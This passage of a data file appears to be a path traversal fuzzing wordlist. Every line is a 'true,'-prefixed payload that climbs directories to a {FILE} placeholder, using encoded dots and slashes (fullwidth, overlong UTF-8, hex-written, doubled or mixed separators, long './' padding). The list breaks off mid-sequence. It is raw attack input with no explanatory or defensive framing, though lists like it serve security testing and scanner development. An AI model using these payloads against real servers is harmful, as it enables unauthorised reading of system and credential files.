"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,..0x2f{FILE}",
"true,..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,..0x5c{FILE}",
"true,..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,///%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,\\\\\\%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..//{FILE}",
"true,..//..//{FILE}",
"true,..//..//..//{FILE}",
"true,..//..//..//..//{FILE}",
"true,..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//..//{FILE}",
"true,..///{FILE}",
"true,..///..///{FILE}",
"true,..///..///..///{FILE}",
"true,..///..///..///..///{FILE}",
"true,..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///..///{FILE}",
"true,..\\\\{FILE}",
"true,..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,./\\/./{FILE}",
"true,./\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,./../{FILE}",
"true,./.././../{FILE}",
"true,./.././.././../{FILE}",
"true,./.././.././.././../{FILE}",
"true,./.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././.././../{FILE}",
"true,.\\..\\{FILE}",
"true,.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.//..//{FILE}",
"true,.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,../{FILE}",
"true,../..//{FILE}",
"true,../..//../{FILE}",
"true,../..//../..//{FILE}",
"true,../..//../..//../{FILE}",
"true,../..//../..//../..//{FILE}",
"true,../..//../..//../..//../{FILE}",
"true,../..//../..//../..//../..//{FILE}",
"true,..\\{FILE}",
"true,..\\..\\\\{FILE}",
"true,..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..///{FILE}",
"true,../..///{FILE}",
"true,../..//..///{FILE}",
"true,../..//../..///{FILE}",
